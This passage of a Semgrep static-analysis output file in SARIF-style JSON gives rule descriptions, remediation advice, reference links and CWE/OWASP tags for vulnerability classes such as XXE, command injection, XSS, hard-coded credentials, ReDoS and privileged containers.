`Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","id":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","name":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"help":{"markdown":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0)\n","text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","id":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","name":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","id":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","name":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"help":{"markdown":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance)\n - [https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx](https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx)\n","text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","id":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","name":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","properties":{"precision":"very-high","tags":["CWE-1323: Improper Management of Sensitive Trace Data","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy)\n - [https://docs.cherrypy.dev/en/latest/tutorials.html](https://docs.cherrypy.dev/en/latest/tutorials.html)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","id":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","name":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"help":{"markdown":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n - [https://www.youtube.com/watch?v=yYTkLUEdIyE](https://www.youtube.com/watch?v=yYTkLUEdIyE)\n - [https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough](https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough)\n","text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","id":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","name":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Heroku API Key detected"},"help":{"markdown":"Heroku API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Heroku API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","id":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","name":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"help":{"markdown":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response","id":"python.aws-lambda.security.tainted-html-response.tainted-html-response","name":"python.aws-lambda.security.tainted-html-response.tainted-html-response","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.tainted-html-response.tainted-html-response"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","id":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","name":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","id":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","name":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"help":{"markdown":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples](https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples)\n","text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","id":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","name":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express","id":"javascript.express.code.vm2-express.vm2-express","name":"javascript.express.code.vm2-express.vm2-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm2-express.vm2-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"help":{"markdown":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service)\n - [https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html](https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html)\n - [https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/](https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/)\n","text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service","id":"yaml.docker-compose.security.privileged-service.privileged-service","name":"yaml.docker-compose.security.privileged-service.privileged-service","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.privileged-service.privileged-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"help":{"markdown":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt)\n - [https://cryptography.io/en/latest/random-numbers/#random-number-generation](https://cryptography.io/en/latest/random-numbers/#random-number-generation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"helpUri":"https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","id":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","name":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","id":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","name":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","id":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","name":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.web.django-cookie-samesite-none.django-cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"help":{"markdown":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n - [https://en.wikipedia.org/wiki/Mass_assignment_vulnerability](https://en.wikipedia.org/wiki/Mass_assignment_vulnerability)\n","text":"Depending on the context, user control data in 